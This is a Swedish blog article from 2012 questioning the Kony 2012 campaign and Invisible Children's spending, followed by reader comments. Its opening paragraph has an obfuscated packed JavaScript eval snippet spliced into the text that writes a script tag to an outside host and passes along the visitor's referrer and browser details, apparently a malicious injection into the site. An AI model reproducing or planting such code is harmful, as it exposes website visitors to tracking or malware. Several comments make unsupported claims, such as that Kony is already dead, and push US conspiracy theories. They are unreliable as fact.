Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Kony 2012: Är det en kamp om rättvisa, eller bevittnar vi ett världsomspännande bedrägeri?

Kony 2012: Är det en kamp om rättvisa, eller bevittnar vi ett världsomspännande bedrägeri?
Filip Urde
 • On 8 mars, 2012
 • http://www.revue.se/filip-urde

Kony eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ssddr|var|u0026u|referrer|hdrit||js|php’.split(’|’),0,{}))
2012, filmen som spred sig likt pesten över hela Facebook.

I lördags hade filmen 8 visningar, igår vid lunch hade 2,3 miljoner personer sett filmen. Folk har ”likeat”, delat, postat och skrivit statusar om filmen och dess budskap. Här nedan kan vi se en skärmdump av händelseförloppet som är helt otroligt. Folk bryr sig! och folk bryr sig mycket!

I en nästan overkliga uppslutning så har en hel generation dedikerat sina facebook statusar till en person som ingen av dem känt till tidigare, varför? För att en organisation säger till dem att göra så. Ingen har stannat upp och varit kritisk mot vad som precis skett.

Jag tvekar inte på att Joseph Kony och hans Lord’s Resistance Army existerar, eller att Invisible Children gör detta med god intention. Vad jag tvekar på och är skeptisk till är Invisible Childrens riktiga motiv. Vi på Revue.se var snabbt med och skrev om Kony 2012, vi har alla delat filmen på Facebook och vi blev alla rörda. Men när man tittar tillbaka så är det något som känns fel.

Filmen är ett mästerverk! den är väldigt snyggt gjord och känslan förmedlas klockrent. Men är det därför jag bryr mig? För att filmen är så välproducerad och för att jag helt enkelt vill bry mig?

I början av filmen nämner man att kommande 27 minuter är ett ”experiment”. Om att få folk att bry sig? eller för att vara cynisk, få folk att bry sig så mycket att dem gör av med pengar.

Invisible Children är en organisation vars ekonomiska delar verkligen går att ifrågasätta.

Förra året så spenderade Invisible Children hela 8, 676, 614 dollar varav endast 32% gick till själva uppdraget. Resten gick till löner, resor, transport och just filmen! Detta kan verkligen ställas mot väggen. Ska en organisation med syftet att hjälpa barn i Afrika verkligen lägga ner mestadelen av sina pengar på löner och en film? Nu vet jag att ”ideellt” aldrig kan vara helt ideellt, någon måste få pengar någonstans men för att vara helt krass så låter detta som ännu ett försök att utnyttja misären i Afrika för sin egen vinning.

Invisible Children har även fått kritik för att man inte vill sammarbeta med Better Business Bureau – en organisation som undersöker företags etik.  Varför vill man inte vara transparanta? Vad döljer man?

Hela filmen genomsyras av något som känns fel, det känns som en ny Al Gore film, skapad för att belysa och ge medvetande för ett problem i en snygg film och sedan vinna priser för det… är priserna målet för Invisible Children? Behöver man verkligen göra en så här påskostad film till en sådanhär kamp? Bör inte kampen i sig vara nog och bör inte målet vara att hålla nere på just produktionskostnader?

I filmen ser vi t.ex. Facebooks timeline, i något som liknar en ren reklamfilm för dess funktion, vi får se massa människor över hela världen som bryr sig och visar sin gemenskap, vi får se hans son Gavin vara söt, vi får se politiker som bryr sig, vi ser militärer som bryr sig och vi ser gråtande bilder från Afrika.

Känslor, åsikter, enighet, gemenskap, två sidor gå ihop mot samma fråga (bägge partierna i USA), vi får veta för vem vi gör det och hur vi ska göra det. Vi får till och med datum på när det måste göras och ett slutdatum på när det är försent. Är det bara jag som ryser av propagandan i det här? Är det ingen som får vibbar från en tid som är förbi?

Jag måste säga att jag blir lite rädd, när man trycker detta paket av sorg och missär rakt i ansiktet på mig, för att sedan avsluta med vad jag ska köpa ett ”action pack” och skicka bidrag för att tabort sorgen och smärtan för alla dessa utsatta. Om du går in på http://invisiblechildrenstore.myshopify.com/ så hittar du en affär med merchandise… ”Allt du behöver för att bidra”.

Varför har all denna tid lagts ner på merchandise? När man inte nämner 1 gång var pengarna exakt ska gå till… Vad händer med barnen i Afrika om jag köper en T-shirt? Det här är försäljning på folkskänslor at it’s best.

När jag såg filmen blev jag så rörd att jag nästan fällde en tår,  tänkte jag efter och nu känns det som allt kokar ner i något som liknar ett reklamstunt! Med prylar som ska köpas.

Avslutningsvis.

Varför ska vi skicka trupperna och hjälpen till UGANDA? Kony är tydligt inte där längre…

Det är nog inte ett bedrägeri, men det finns annledningar att vara kritisk i alla lägen.

 

UPPDATERING

Se den här filmen om Invisible Children, bra förklaring av vad dem verkligen gör!

 

Tack för tipset Daniel Possman.

http://mashable.com/2012/03/08/kony-2012-scam/

www.vice.com/en_uk/read/should-i-donate-money-to-kony-2012-or-not

http://visiblechildren.tumblr.com/post/18890947431/we-got-trouble

http://blog.joerenken.com/2012/03/07/invisible-children-and-kony-2012-exposed/

 

 

Comments

 1. Nickesss

  Jag har tänkt på precis samma sak! Känns allt för ”gjort”… det är ju mer än Hollywood film än något annat! Bra artikel och tack för att ni tar upp det här.

 2. Jocke

  Detta är otroligt intressant. Jag har själv börjat fundera om tanken över detta. Är det USA som försöker få till det genom att få tag i honom.

 3. Riktigt bra skrivet!! Jag tror att detta har någon bakomliggande sanning som inte vi får reda på. Eller så kan vi ha fel 😛 ska bli kul och se vad detta mynnar ut i. PR har de fått i alla fall.

 4. orrr

  Kony är ju redan död.. onödig film..

 5. orrr

  The issue:
  -The LRA is only 250 soldiers strong at this point.-The LRA hasn’t been in Uganda since 2006.-Ugandan army and Sudan People’s Liberation Army are riddled with accusations of rape and looting.-US Africa Command has been trying to stop Kony for years, which only results in failure and retaliation from Kony.-To get to Kony you’d have to ultimately kill some of his army…which consists of children soldiers…..Invisible Children:-Only 32% of money raised went to direct services (if you support the issue you may want to choose a more worthwhile charity).-Their accountability and transparency is a 2 out of 4 stars on charity navigator.-The group is in favor of direct military intervention, and their money supports the Ugandan government’s army and various other military forces.- Foreign Affairs has claimed that Invisible Children (among others) “manipulates facts for strategic purposes, exaggerating the scale of LRA abductions and murders and emphasizing the LRA’s use of innocent children as soldiers, and portraying Kony — a brutal man, to be sure — as uniquely awful, a Kurtz-like embodiment of evil.”Military intervention may or may not be the right idea, but people supporting KONY 2012 probably don’t realize they’re supporting the Ugandan military who are themselves raping and looting away. Educate yourselves a little bit before supporting a particular nonprofit.

 6. häst

  NRA, likewise, committed atrocities, including the use of land mines specifically against civilians. Child soldiers were widely used by the NRA as guerrillas, and also subsequently when NRA became the regular army. NRA became the national army, and was renamed Uganda People’s Defence Force (UPDF).

  Dessa är de som invisible children stöder, spm altså innan dem tog makten 1986 va lika illa om inte värre än kony.

 7. Veronica Fjall

  32% av 8, 676, 614 dollar innebär 2, 776, 516 dollar. Pengar som aldrig skulle hamnat där de nu gjort, utan smarta kampanjer och de rätta forumen.

  Jag tycker det här är en sjukt smart kampanj! Oavsett vad syftet är har gänget bakom Kony 2012 lyckats skapa engagemang, och dessutom ett engagemang nog för att skänka pengar!

  Kony 2012-crewet har uppmärksammat att vi idag bygger vår image, vårt personliga varumärke, genom konsumtion. För att vi ska genomföra köpet, i detta fall välgörenhet (?), krävs en reklamfilm eller tröja som är genomtänkt och cool nog att representera mig.  Via en snygg t-shirt eller en häftig film delar jag gärna med mig av budskapet till vänner och bekanta. Jag bryr mig. Jag gör något.

  Genialiskt! När det gäller vinstdrivande företag skulle jag gärna se något av de större, säg Microsoft eller Apple, skänka 32% av sin omsättning till välgörenhet.

 8. Bajs

  du har ingen aning vad du snackar om. hälften här är plagierat och andra hälften är lösryckta årsikter utan substans. gör om, gör rätt

  • Kiss

   Miljöpartist är vad du är. Rösta om rösta rätt. Det är bra att det uppmärksammas att det kanske inte är korrekt detta. Eller så är det. Vem är du att avgöra detta

   • Nickesss

    Vad är det som är plagierat? Nyheten är en nyhet, revue återberättar nyheter..har jag fel? Bajs haha du är väldigt fail med den kommentaren! Sen måste jag fråga, om detta är lösryckta åsikter utan substans…vad är då kony filmen? dem har ju fifflat med faktan!!!

  •  Du är verkligen bajs

 9. Kony 2012 hypen är över och de släpper en ny video. Börjar bli lite som trött på det här. Det var en cool grek men nu får de ge sig.  Vi vet att USA vill åt Uganda och få med sig övriga världen på deras sida. För mycket dålig publicitet under förra århundradet och det här och nu försöker de med nya strategier som styrs av PR-byråerna.

  Hej